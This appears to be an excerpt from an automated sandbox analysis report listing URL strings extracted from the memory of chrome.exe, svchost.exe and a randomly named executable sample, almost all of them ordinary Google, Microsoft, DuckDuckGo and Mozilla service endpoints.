Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2444288578.00000784002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2444271757.00000784002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: JWBIEC.16.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: JWBIEC.16.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: xoJxSAotVM.exe	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportinternal_codedescriptionunknown_codeos_errorUnknow
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000015.00000003.2452690071.0000377800490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: J5PP8Q.16.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp, J5PP8Q.16.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabH
Source: chrome.exe, 00000015.00000003.2471762260.0000377800C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: J5PP8Q.16.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000016.00000003.2452424693.0000014B372C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000016.00000003.2452424693.0000014B372C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.22.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/#o
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)m
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-o
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3m
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4o
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6m
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/7o
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Gn
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Jn
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Qn
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Tn
Source: chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hj
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/rn
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~k
Source: chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000015.00000003.2448695853.0000682C00684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000015.00000003.2507219938.00003778015C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507301093.00003778015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2507163538.00003778015BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: JWBIEC.16.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000015.00000003.2467723159.000037780037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000015.00000003.2504194877.00003778019D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000015.00000003.2504194877.00003778019D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000015.00000003.2504194877.00003778019D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard7x
Source: chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000015.00000003.2448209148.0000682C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000015.00000003.2449123305.0000682C006E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000015.00000003.2448464919.0000682C0039C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000015.00000003.2452959740.00003778006C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: chrome.exe, 00000015.00000003.2451571598.00003778001D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000015.00000003.2451571598.00003778001D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api7x
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510675269.0000377800F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000015.00000003.2452915418.00003778006E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000015.00000003.2512036518.0000377800E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19044659
Source: svchost.exe, 00000016.00000003.2452424693.0000014B372C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.22.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: chrome.exe, 00000015.00000003.2512156477.0000377801A78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000015.00000003.2512156477.0000377801A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471344388.0000377800A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000015.00000003.2471344388.0000377800A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000015.00000003.2512156477.0000377801A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471344388.0000377800A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000015.00000003.2471344388.0000377800A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000015.00000003.2512156477.0000377801A78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2471344388.0000377800A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000015.00000003.2476298962.000037780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2475790000.00003778003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2476157989.00003778010B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000015.00000003.2504350139.000037780140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000015.00000003.2497922685.0000377800338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000015.00000003.2511999983.000037780196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2512454634.0000377801D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2510888695.0000377801C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2511966285.0000377801950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
